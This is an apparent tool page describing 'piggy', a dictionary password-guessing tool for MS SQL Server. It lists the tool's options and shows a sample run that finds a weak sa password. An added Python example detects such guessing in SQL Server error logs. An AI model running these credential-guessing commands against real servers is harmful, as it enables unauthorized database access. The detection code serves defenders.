piggy
Piggy is another nice little dictionary-based attack tool for MS SQL
Server. It is command-line based, dead easy to use, and
supports attacks against multiple hosts/accounts and passwords.
Another great tool from patrik.
It is available from here.
Execution:
usage: piggy [options]
the options being:
-u <username> - Single username
-p <password> - Single password
-s <server> - Single server
-S <srvfile> - File containing ip/hostnames
-D <dicfile> - File containing passwords
-A <accounts> - File containing username;password combinations
-N - Do not check availability before scan
-v verbose - Verbose logging
Expected output:
C:\piggy -u sa -p password -s 200.100.100.175
Piggy v1.0.1 by patrik@cqure.net
--------------------------------
[i] Loaded 1 dictionary items
[i] Checking server availability
Started scan against DB on '200.100.100.175'
FOUND [SERVER=200.100.100.175;UID=sa;PWD=password]
As you can see from the above, I only used a
single password attempt against the sa account; obviously, if you were to
conduct a dictionary-based attack you would use the -D option and supply
an appropriate wordlist.
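Added example (not part of the original page or of piggy itself): from the defender's side, a dictionary run like the one described above appears in the SQL Server error log as a burst of failed logins from one client, possibly ending in a success. The Python below assumes login auditing records both failed and successful logins; the log lines, addresses, threshold and the function name find_guessing are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample in the SQL Server error log layout; addresses are made up.
SAMPLE_LOG = """\
2024-05-01 10:00:01.10 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.0.2.10]
2024-05-01 10:00:01.35 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.0.2.10]
2024-05-01 10:00:01.60 Logon       Login failed for user 'admin'. Reason: Could not find a login matching the name provided. [CLIENT: 192.0.2.10]
2024-05-01 10:00:01.85 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.0.2.10]
2024-05-01 10:00:02.10 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.0.2.10]
2024-05-01 10:00:02.40 Logon       Login succeeded for user 'sa'. Connection made using SQL Server authentication. [CLIENT: 192.0.2.10]
2024-05-01 10:05:00.00 Logon       Login failed for user 'report'. Reason: Password did not match that for the login provided. [CLIENT: 198.51.100.7]
2024-05-01 10:05:09.00 Logon       Login succeeded for user 'report'. Connection made using SQL Server authentication. [CLIENT: 198.51.100.7]
2024-05-01 10:06:00.00 Backup      Database backed up.
"""

# Matches both audit messages and captures the outcome, login name and client.
EVENT = re.compile(
    r"Login (?P<result>failed|succeeded) for user '(?P<user>[^']*)'"
    r".*\[CLIENT: (?P<client>[^\]]+)\]"
)


def find_guessing(log_text, threshold=3):
    """Return per-client findings for clients with >= threshold failed logins.

    'guessed' lists logins that succeeded from a client only after that client
    had already reached the threshold while failing on the same login name.
    """
    stats = defaultdict(lambda: {"failures": 0, "logins": set(), "guessed": []})
    for line in log_text.splitlines():
        m = EVENT.search(line)
        if not m:
            continue  # not a login audit line
        s = stats[m["client"].strip()]
        if m["result"] == "failed":
            s["failures"] += 1
            s["logins"].add(m["user"])
        elif s["failures"] >= threshold and m["user"] in s["logins"]:
            s["guessed"].append(m["user"])
    return {c: s for c, s in stats.items() if s["failures"] >= threshold}


if __name__ == "__main__":
    for client, s in find_guessing(SAMPLE_LOG).items():
        print(client, s["failures"], sorted(s["logins"]), s["guessed"])
```

A login listed under guessed should be treated as compromised: reset its password and review what that session did after the successful logon.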